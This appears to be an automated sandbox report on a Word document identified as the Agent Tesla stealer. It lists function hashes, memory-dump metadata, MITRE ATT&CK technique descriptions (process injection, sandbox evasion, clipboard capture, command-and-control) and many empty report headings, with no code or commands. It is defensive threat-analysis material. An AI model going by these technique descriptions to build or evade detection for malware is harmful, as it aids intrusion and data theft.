Instruction Fuzzy Hash: 62F0BB30924106CBDB14FF90C458BBEBBF09B0835AF341825D902A65D0D7B549D5EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 002536B7, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da22a04dcb45d8ce074b1429fde1a883d8a17e4e25f23948f58f3e01c49488e
Instruction ID: 77ef32b0677009f7130294a5ee5954b8e9f9614c79e364205e33094e47286e4c
Opcode Fuzzy Hash: 2da22a04dcb45d8ce074b1429fde1a883d8a17e4e25f23948f58f3e01c49488e
Instruction Fuzzy Hash: 44F02E72724345DBC701EF64405117DB2526B86344710951EC845DFB51DFB49E1D9BCF

Uniqueness

Uniqueness Score: -1.00%

Function 00251A6F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b2bf62dd0d26e4813ed04e490c5e2b0dc16309e4ee9d9afcbd8294240030a4
Instruction ID: 874f1fe551ea481a49ab2134ea0d64b00304e75143f389473b12ab3187d1255c
Opcode Fuzzy Hash: 09b2bf62dd0d26e4813ed04e490c5e2b0dc16309e4ee9d9afcbd8294240030a4
Instruction Fuzzy Hash: D2F0A031529241CBDB219F68D4987D937B0EB02305F208945C8918A6A4D7B5A9FDDB09

Uniqueness

Uniqueness Score: -1.00%

Function 0025207A, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb573b4040c2a70dac34c85596b5e1f023aa69701292d2448b409f57d19d3259
Instruction ID: e2224f9171edff29efdf5b4740222a88f6805192b5956ca2306fd465bfd5d30b
Opcode Fuzzy Hash: cb573b4040c2a70dac34c85596b5e1f023aa69701292d2448b409f57d19d3259
Instruction Fuzzy Hash: 55E0D834B0B3C15FE3168B349806B193FE19BA2304F088496D805CB2E7EA30CC4EC705

Uniqueness

Uniqueness Score: -1.00%

Function 002538AF, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86800d496115e8020b6d0b11683eb48827bce5722863a75ffbf4ea27d2548f
Instruction ID: cd1a66c7129d59fd285d421e944461b4e935372791e76d03656078f72c8e322e
Opcode Fuzzy Hash: ef86800d496115e8020b6d0b11683eb48827bce5722863a75ffbf4ea27d2548f
Instruction Fuzzy Hash: 47D0C23432622487C744ABB08C6803C26528B85392B20056ACC4787BA0EF700E849B8F

Uniqueness

Uniqueness Score: -1.00%

Function 00252088, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ab337cc1c0fbc670036770cedda4473f429848dfd02d68918d787fb7f56a59
Instruction ID: 589189e29e52e7ce16157f96a20c8959efe0bdb2accb58845ac2db003a1f7d51
Opcode Fuzzy Hash: d0ab337cc1c0fbc670036770cedda4473f429848dfd02d68918d787fb7f56a59
Instruction Fuzzy Hash: 93D05E347063068FD314DF29D809B2673D69784301F44C421E808CB3E9EE30EC99C604

Uniqueness

Uniqueness Score: -1.00%

Function 00251B44, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1888e201ecd816cb6c3af4e52f4fdc5dec9794881c5631c6ec5dec98c68bbebf
Instruction ID: 81f2322ac29130ba9d6ad0840687051a9a8647f0d762e3c119dc62d86123eabf
Opcode Fuzzy Hash: 1888e201ecd816cb6c3af4e52f4fdc5dec9794881c5631c6ec5dec98c68bbebf
Instruction Fuzzy Hash: DFE01270A25155DBDB008FA8D85876E77F4AF05301F109955D811C2585DB34D479DF15

Uniqueness

Uniqueness Score: -1.00%

Function 00253597, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546bcbc281312a8f997fd521fc79ea17154ceb52d73f273b0f76335f172040a7
Instruction ID: 3c35119ecb451f146a2ac96a3b51f534baeab298ac1a30cbabf546cfbd006e64
Opcode Fuzzy Hash: 546bcbc281312a8f997fd521fc79ea17154ceb52d73f273b0f76335f172040a7
Instruction Fuzzy Hash: ABE0C230224286CFC750EF64E040A6837A1FF40309F100871E102CF578FB719D889B82

Uniqueness

Uniqueness Score: -1.00%

Function 00251A0D, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9071c09be8d8836db7bd4bd9a725247c53630b3aca720766e8b38bea1d9f53
Instruction ID: 77cfa95c48676a33af21ca7ee6028bb1a53ea2334316e50ca79eb5d5b986ce43
Opcode Fuzzy Hash: 7e9071c09be8d8836db7bd4bd9a725247c53630b3aca720766e8b38bea1d9f53
Instruction Fuzzy Hash: 9FE0EC7892A106CBC709CF61D8697BE7BB1EB45305F20842AD506526A0DB7004E5DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00251980, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac9ddefa90fc044e562f1a5a908ec8f82e71c47b3fea2bf8f7ba2954ce9efa2
Instruction ID: ea727e715a4bfdd7a46cf6e095e7154c9cd1bbbd2bdba05f857d1714d5685ef5
Opcode Fuzzy Hash: aac9ddefa90fc044e562f1a5a908ec8f82e71c47b3fea2bf8f7ba2954ce9efa2
Instruction Fuzzy Hash: 1FC08C7042A608ABD60132AAC8192277B788B85713F4140309A0252281BFB1A578D4A6

Uniqueness

Uniqueness Score: -1.00%

Function 002526D0, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8d47ce3a291185e801e072c2ec6d2447d4df89022e64a2d363df52f4ea26da
Instruction ID: 9ceab5533ced19ef8c888777192c82e61b606eb4f1dc82cb17a1456893e4369e
Opcode Fuzzy Hash: fd8d47ce3a291185e801e072c2ec6d2447d4df89022e64a2d363df52f4ea26da
Instruction Fuzzy Hash: CFC092868297908EDF030A305C260C13F70EE63305B8E18CBD8418A2A3E248CF0B9366

Uniqueness

Uniqueness Score: -1.00%

Function 00251BD2, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2344476444.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e737718cf11733f78742a0097875f135b814a156c399befa1ac0d17e1c902770
Instruction ID: c43274ac29db93e3fcbf5d4e8f59f07d5bc306f19c6d1cde27b06e3ca017ed19
Opcode Fuzzy Hash: e737718cf11733f78742a0097875f135b814a156c399befa1ac0d17e1c902770
Instruction Fuzzy Hash: E9C00275A16449CBDB08EFA0CAAA5BE7777AB443027210029D51A762A1DB301E24CF66

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IMG_05412_868_21.docx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/404303/sample/IMG_05412_868_21.docx"

Indicators

Summary

Document Summary

Streams

Stream Path: \x1oLE10naTiVE, File Type: data, Stream Size: 1420

General

Network Behavior

Snort IDS Alerts

Network Port Distribution